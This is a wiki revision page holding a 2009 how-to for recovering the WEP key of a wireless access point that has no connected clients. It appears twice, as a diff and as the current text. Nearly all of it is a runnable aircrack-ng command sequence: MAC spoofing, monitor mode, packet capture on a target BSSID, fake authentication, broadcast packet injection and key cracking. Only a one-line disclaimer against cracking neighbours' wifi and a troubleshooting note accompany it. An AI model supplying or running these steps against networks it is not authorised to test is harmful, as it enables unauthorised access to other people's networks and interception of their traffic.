Cracking a clientless wep AP: Difference between revisions
From D3xt3r01.tk
Jump to navigationJump to search
New page: ==WHY== Not all AP's have a client connected ...I'll assume you already have a supported card and the injection is working !!! I'll also assume that you know what you're doing and you're ... |
m →HOW |
||
Line 9: | Line 9: | ||
ifconfig wlan0 down | ifconfig wlan0 down | ||
2) change card mac | 2) change card mac | ||
ifconfig wlan0 hw ether 00:11:22:33:44:55 | ifconfig wlan0 hw ether 00:11:22:33:44:55 up | ||
3) start it in monitor mode | 3) get some access points | ||
iwlist wlan0 scan | |||
4) start it in monitor mode | |||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
5) start dumping packets | |||
airodump-ng -c channel -w file --bssid ap_mac wlan0 | airodump-ng -c channel -w file --bssid ap_mac wlan0 | ||
6) fake auth | |||
aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0 | aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0 | ||
7) play some fake packets ( you should see the packets grow fast in the airodump-ng window ) | |||
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0 | aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0 | ||
8) crack it !!! | |||
aircrack-ng file-01.cap | aircrack-ng file-01.cap | ||
Revision as of 17:28, 28 July 2009
WHY
Not all AP's have a client connected ...I'll assume you already have a supported card and the injection is working !!! I'll also assume that you know what you're doing and you're not doing anything illegal ! DON'T GO CRACKING NEIGHBOURs wifi...
HOW
1) stop the card
airmon-ng stop wlan0 ifconfig wlan0 down
2) change card mac
ifconfig wlan0 hw ether 00:11:22:33:44:55 up
3) get some access points
iwlist wlan0 scan
4) start it in monitor mode
airmon-ng start wlan0
5) start dumping packets
airodump-ng -c channel -w file --bssid ap_mac wlan0
6) fake auth
aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0
7) play some fake packets ( you should see the packets grow fast in the airodump-ng window )
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0
8) crack it !!!
aircrack-ng file-01.cap
STUFF
If something's wrong .. you're probably not auth'ed .. or the injection doesn't work .. or you're too far away .. bla bla bla